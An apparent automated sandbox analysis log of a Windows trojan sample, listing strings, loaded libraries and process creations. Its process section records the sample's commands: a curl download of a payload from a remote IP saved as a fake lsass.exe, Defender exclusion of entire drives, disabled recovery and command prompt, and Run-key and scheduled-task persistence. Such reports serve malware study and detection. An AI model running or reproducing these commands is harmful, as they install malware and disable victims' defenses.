Source: powershell.exe, 00000019.00000002.2338794163.0000021E9EA5A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001E.00000002.2415344065.000002A9BBA29000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000022.00000002.2548374965.000001FE63219000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000023.00000002.2718284212.000002C79BE99000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/
Source: powershell.exe, 00000019.00000002.2338794163.0000021E9E831000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001E.00000002.2415344065.000002A9BB801000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000022.00000002.2548374965.000001FE62FF1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000023.00000002.2718284212.000002C79BC87000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: powershell.exe, 00000019.00000002.2338794163.0000021E9EA5A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001E.00000002.2415344065.000002A9BBA29000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000022.00000002.2548374965.000001FE63219000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000023.00000002.2718284212.000002C79BE99000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/wsdl/
Source: powershell.exe, 00000023.00000002.2718284212.000002C79BE99000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
Source: powershell.exe, 00000019.00000002.2374337905.0000021EB6D5A000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000022.00000002.2670965885.000001FE7B692000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.micom/pkiops/Docs/ry.htm0
Source: powershell.exe, 00000022.00000002.2670965885.000001FE7B712000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.microsoft.co
Source: powershell.exe, 00000019.00000002.2338794163.0000021E9E831000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001E.00000002.2415344065.000002A9BB801000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000022.00000002.2548374965.000001FE62FF1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000023.00000002.2718284212.000002C79BC87000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://aka.ms/pscore68
Source: powershell.exe, 00000023.00000002.2847319683.000002C7ABCDC000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/
Source: powershell.exe, 00000023.00000002.2847319683.000002C7ABCDC000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/Icon
Source: powershell.exe, 00000023.00000002.2847319683.000002C7ABCDC000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/License
Source: powershell.exe, 00000023.00000002.2718284212.000002C79BE99000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://github.com/Pester/Pester
Source: powershell.exe, 00000019.00000002.2362998078.0000021EAE89E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001E.00000002.2490759240.000002A9CB86E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000022.00000002.2647393715.000001FE7305E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000023.00000002.2847319683.000002C7ABCDC000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://nuget.org/nuget.exe
Source: curl.exe, 00000007.00000002.2181282531.000001B169840000.00000004.00000020.00020000.00000000.sdmp, D3B2.bat.0.dr	String found in binary or memory: https://rentry.co/i7zgdqy6/raw/
Source: curl.exe, 00000007.00000003.2181061378.000001B169857000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 00000007.00000003.2180548349.000001B169854000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 00000007.00000002.2181317822.000001B169857000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://rentry.co/i7zgdqy6/raw/5
Source: curl.exe, 00000007.00000002.2181352575.000001B16987B000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 00000007.00000003.2180410147.000001B16987A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://rentry.co/i7zgdqy6/raw/P
Source: curl.exe, 00000007.00000002.2181282531.000001B169840000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://rentry.co/i7zgdqy6/raw/Winsta0
Source: curl.exe, 00000007.00000002.2181282531.000001B169840000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://rentry.co/i7zgdqy6/raw/curl

Source: unknown	Network traffic detected: HTTP traffic on port 49713 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49713

Source: unknown

HTTPS traffic detected: 104.26.3.16:443 -> 192.168.2.6:49713 version: TLS 1.2

Source: C:\Windows\System32\cmd.exe	File created: C:\Windows\appcompat\ssh	Jump to behavior
Source: C:\Windows\System32\ReAgentc.exe	File created: C:\Windows\Logs\ReAgent	Jump to behavior
Source: C:\Windows\System32\ReAgentc.exe	File created: C:\Windows\Logs\ReAgent\ReAgent.log	Jump to behavior

Source: C:\Users\user\Desktop\nkYzjyrKYK.exe	Code function: 0_2_00411079	0_2_00411079
Source: C:\Users\user\Desktop\nkYzjyrKYK.exe	Code function: 0_2_00411C20	0_2_00411C20
Source: C:\Users\user\Desktop\nkYzjyrKYK.exe	Code function: 0_2_00411033	0_2_00411033
Source: C:\Users\user\Desktop\nkYzjyrKYK.exe	Code function: 0_2_00410C80	0_2_00410C80
Source: C:\Users\user\Desktop\nkYzjyrKYK.exe	Code function: 0_2_00410CA0	0_2_00410CA0
Source: C:\Users\user\Desktop\nkYzjyrKYK.exe	Code function: 0_2_0040B9C7	0_2_0040B9C7
Source: C:\Users\user\Desktop\nkYzjyrKYK.exe	Code function: 0_2_0040FA68	0_2_0040FA68
Source: C:\Users\user\Desktop\nkYzjyrKYK.exe	Code function: 0_2_0040CF18	0_2_0040CF18
Source: C:\Users\user\Desktop\nkYzjyrKYK.exe	Code function: 0_2_0040EFF0	0_2_0040EFF0
Source: C:\Users\user\Desktop\nkYzjyrKYK.exe	Code function: 0_2_00410FB0	0_2_00410FB0
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 25_2_00007FFD3477A0F5	25_2_00007FFD3477A0F5
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 25_2_00007FFD3477945D	25_2_00007FFD3477945D
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 25_2_00007FFD347785FA	25_2_00007FFD347785FA
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 25_2_00007FFD347785D3	25_2_00007FFD347785D3
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 25_2_00007FFD34775BFA	25_2_00007FFD34775BFA
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 25_2_00007FFD3477604D	25_2_00007FFD3477604D
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 30_2_00007FFD3479604D	30_2_00007FFD3479604D
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 30_2_00007FFD34795CFA	30_2_00007FFD34795CFA
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 30_2_00007FFD347984F2	30_2_00007FFD347984F2
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 30_2_00007FFD3479A1FB	30_2_00007FFD3479A1FB
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 30_2_00007FFD34798E25	30_2_00007FFD34798E25
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 30_2_00007FFD347916F2	30_2_00007FFD347916F2
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 30_2_00007FFD34795BFA	30_2_00007FFD34795BFA
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 34_2_00007FFD3479945D	34_2_00007FFD3479945D
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 34_2_00007FFD347985FA	34_2_00007FFD347985FA
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 34_2_00007FFD3479260D	34_2_00007FFD3479260D
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 34_2_00007FFD347985D3	34_2_00007FFD347985D3
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 34_2_00007FFD34795BFA	34_2_00007FFD34795BFA
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 34_2_00007FFD3479604D	34_2_00007FFD3479604D
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 35_2_00007FFD347664FB	35_2_00007FFD347664FB
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 35_2_00007FFD347684D3	35_2_00007FFD347684D3
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 35_2_00007FFD34762608	35_2_00007FFD34762608
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 35_2_00007FFD34768E25	35_2_00007FFD34768E25
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 35_2_00007FFD347616F2	35_2_00007FFD347616F2
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 35_2_00007FFD347662F3	35_2_00007FFD347662F3
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 35_2_00007FFD34765BFA	35_2_00007FFD34765BFA
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 35_2_00007FFD3476BBFB	35_2_00007FFD3476BBFB

Source: nkYzjyrKYK.exe

Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE

Source: C:\Windows\System32\cmd.exe

Process created: C:\Windows\System32\reg.exe reg add "HKCU\Software\Policies\Microsoft\Windows\System" /v "DisableCMD" /t REG_DWORD /d 2 /f

Source: classification engine

Classification label: mal100.troj.evad.winEXE@55/34@1/4

Source: C:\Users\user\Desktop\nkYzjyrKYK.exe

Code function: 0_2_00402664 LoadResource,SizeofResource,FreeResource,

0_2_00402664

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Mutant created: NULL
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3840:120:WilError_03

Source: C:\Users\user\Desktop\nkYzjyrKYK.exe

File created: C:\Users\user\AppData\Local\Temp\D3B0.tmp

Jump to behavior

Source: C:\Users\user\Desktop\nkYzjyrKYK.exe

Process created: C:\Windows\System32\cmd.exe "C:\Windows\sysnative\cmd" /c "C:\Users\user\AppData\Local\Temp\D3B0.tmp\D3B1.tmp\D3B2.bat C:\Users\user\Desktop\nkYzjyrKYK.exe"

Source: C:\Users\user\Desktop\nkYzjyrKYK.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: nkYzjyrKYK.exe

ReversingLabs: Detection: 55%

Source: unknown	Process created: C:\Users\user\Desktop\nkYzjyrKYK.exe "C:\Users\user\Desktop\nkYzjyrKYK.exe"
Source: C:\Users\user\Desktop\nkYzjyrKYK.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\nkYzjyrKYK.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\sysnative\cmd" /c "C:\Users\user\AppData\Local\Temp\D3B0.tmp\D3B1.tmp\D3B2.bat C:\Users\user\Desktop\nkYzjyrKYK.exe"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\PING.EXE ping 8.8.8.8 -n 1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\net.exe net session
Source: C:\Windows\System32\net.exe	Process created: C:\Windows\System32\net1.exe C:\Windows\system32\net1 session
Source: unknown	Process created: C:\Windows\System32\curl.exe curl -s -o u32y.bat https://rentry.co/i7zgdqy6/raw/
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\reg.exe reg add "HKCU\Software\Policies\Microsoft\Windows\System" /v "DisableCMD" /t REG_DWORD /d 2 /f
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\reg.exe reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoControlPanel" /t REG_DWORD /d 1 /f
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\reg.exe reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoControlPanelNamespace" /t REG_DWORD /d 1 /f
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\reg.exe reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableCMD" /t REG_DWORD /d 1 /f
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -Command "Disable-ComputerRestore -Drive 'C:'; Enable-ComputerRestore -Drive 'C:'"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\ReAgentc.exe reagentc.exe /disable
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\attrib.exe attrib +h ssh
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\curl.exe curl -s -o C:\Users\user\AppData\Local\Temp\lsass.exe "http://185.254.97.190:2024/download/XClient.exe"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\lsass.exe lsass.exe
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\reg.exe REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v "windows-app" /t REG_SZ /d "lsass.exe" /f
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\schtasks.exe SCHTASKS /Create /TN "Windows Service" /TR "lsass.exe" /SC ONSTART /RU SYSTEM /F
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\schtasks.exe schtasks /create /tn "winlogon" /tr "lsass.exe" /sc ONSTART /ru SYSTEM /f
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\net.exe net session
Source: C:\Windows\System32\net.exe	Process created: C:\Windows\System32\net1.exe C:\Windows\system32\net1 session
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -ExecutionPolicy Bypass -Command "Add-MpPreference -ExclusionPath 'C:\'"
Source: unknown	Process created: C:\Windows\System32\lsass.exe lsass.exe
Source: unknown	Process created: C:\Windows\System32\lsass.exe lsass.exe
Source: C:\Windows\System32\lsass.exe	Process created: C:\Windows\System32\wbem\WmiPrvSE.exe C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -ExecutionPolicy Bypass -Command "Add-MpPreference -ExclusionPath 'D:\'"
Source: unknown	Process created: C:\Windows\System32\lsass.exe "C:\Windows\system32\lsass.exe"
Source: unknown	Process created: C:\Windows\System32\lsass.exe "C:\Windows\system32\lsass.exe"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -ExecutionPolicy Bypass -Command "Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp'"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -ExecutionPolicy Bypass -Command "Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming'"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\icacls.exe icacls "C:\Windows\appcompat\ssh" /deny user:F
Source: C:\Users\user\Desktop\nkYzjyrKYK.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\sysnative\cmd" /c "C:\Users\user\AppData\Local\Temp\D3B0.tmp\D3B1.tmp\D3B2.bat C:\Users\user\Desktop\nkYzjyrKYK.exe"	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\PING.EXE ping 8.8.8.8 -n 1	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\net.exe net session	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\curl.exe curl -s -o u32y.bat https://rentry.co/i7zgdqy6/raw/	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\reg.exe reg add "HKCU\Software\Policies\Microsoft\Windows\System" /v "DisableCMD" /t REG_DWORD /d 2 /f	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\reg.exe reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoControlPanel" /t REG_DWORD /d 1 /f	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\reg.exe reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoControlPanelNamespace" /t REG_DWORD /d 1 /f	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\reg.exe reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableCMD" /t REG_DWORD /d 1 /f	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -Command "Disable-ComputerRestore -Drive 'C:'; Enable-ComputerRestore -Drive 'C:'"	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\ReAgentc.exe reagentc.exe /disable	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\attrib.exe attrib +h ssh	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\curl.exe curl -s -o C:\Users\user\AppData\Local\Temp\lsass.exe "http://185.254.97.190:2024/download/XClient.exe"	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\lsass.exe lsass.exe	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\reg.exe REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v "windows-app" /t REG_SZ /d "lsass.exe" /f	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\schtasks.exe SCHTASKS /Create /TN "Windows Service" /TR "lsass.exe" /SC ONSTART /RU SYSTEM /F	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\schtasks.exe schtasks /create /tn "winlogon" /tr "lsass.exe" /sc ONSTART /ru SYSTEM /f	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\net.exe net session	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -ExecutionPolicy Bypass -Command "Add-MpPreference -ExclusionPath 'C:\'"	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -ExecutionPolicy Bypass -Command "Add-MpPreference -ExclusionPath 'D:\'"	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -ExecutionPolicy Bypass -Command "Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp'"	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\lsass.exe lsass.exe	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\icacls.exe icacls "C:\Windows\appcompat\ssh" /deny user:F	Jump to behavior
Source: C:\Windows\System32\net.exe	Process created: C:\Windows\System32\net1.exe C:\Windows\system32\net1 session	Jump to behavior
Source: C:\Windows\System32\net.exe	Process created: C:\Windows\System32\net1.exe C:\Windows\system32\net1 session	Jump to behavior

Source: C:\Users\user\Desktop\nkYzjyrKYK.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Desktop\nkYzjyrKYK.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\Users\user\Desktop\nkYzjyrKYK.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\nkYzjyrKYK.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Section loaded: cmdext.dll	Jump to behavior
Source: C:\Windows\System32\PING.EXE	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\System32\PING.EXE	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Windows\System32\PING.EXE	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Windows\System32\net.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Windows\System32\net.exe	Section loaded: wkscli.dll	Jump to behavior
Source: C:\Windows\System32\net.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\System32\net.exe	Section loaded: samcli.dll	Jump to behavior
Source: C:\Windows\System32\net.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\System32\net.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\System32\net1.exe	Section loaded: samcli.dll	Jump to behavior
Source: C:\Windows\System32\net1.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\System32\net1.exe	Section loaded: dsrole.dll	Jump to behavior
Source: C:\Windows\System32\net1.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\System32\net1.exe	Section loaded: wkscli.dll	Jump to behavior
Source: C:\Windows\System32\net1.exe	Section loaded: logoncli.dll	Jump to behavior
Source: C:\Windows\System32\net1.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\System32\curl.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\System32\curl.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\curl.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\System32\curl.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Windows\System32\curl.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\curl.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Windows\System32\curl.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Windows\System32\curl.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Windows\System32\curl.exe	Section loaded: schannel.dll	Jump to behavior
Source: C:\Windows\System32\curl.exe	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\Windows\System32\curl.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Windows\System32\curl.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Windows\System32\curl.exe	Section loaded: ncryptsslp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\System32\ReAgentc.exe	Section loaded: reagent.dll	Jump to behavior
Source: C:\Windows\System32\ReAgentc.exe	Section loaded: cabinet.dll	Jump to behavior
Source: C:\Windows\System32\ReAgentc.exe	Section loaded: wdscore.dll	Jump to behavior
Source: C:\Windows\System32\ReAgentc.exe	Section loaded: dbghelp.dll	Jump to behavior
Source: C:\Windows\System32\ReAgentc.exe	Section loaded: dbgcore.dll	Jump to behavior
Source: C:\Windows\System32\ReAgentc.exe	Section loaded: fveapi.dll	Jump to behavior
Source: C:\Windows\System32\ReAgentc.exe	Section loaded: fveapi.dll	Jump to behavior
Source: C:\Windows\System32\attrib.exe	Section loaded: ulib.dll	Jump to behavior
Source: C:\Windows\System32\attrib.exe	Section loaded: fsutilext.dll	Jump to behavior
Source: C:\Windows\System32\curl.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\System32\curl.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\curl.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\System32\curl.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Windows\System32\curl.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: taskschd.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: xmllite.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: taskschd.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: xmllite.dll	Jump to behavior
Source: C:\Windows\System32\net.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Windows\System32\net.exe	Section loaded: wkscli.dll	Jump to behavior
Source: C:\Windows\System32\net.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\System32\net.exe	Section loaded: samcli.dll	Jump to behavior
Source: C:\Windows\System32\net.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\System32\net.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\System32\net1.exe	Section loaded: samcli.dll	Jump to behavior
Source: C:\Windows\System32\net1.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\System32\net1.exe	Section loaded: dsrole.dll	Jump to behavior
Source: C:\Windows\System32\net1.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\System32\net1.exe	Section loaded: wkscli.dll	Jump to behavior
Source: C:\Windows\System32\net1.exe	Section loaded: logoncli.dll	Jump to behavior
Source: C:\Windows\System32\net1.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
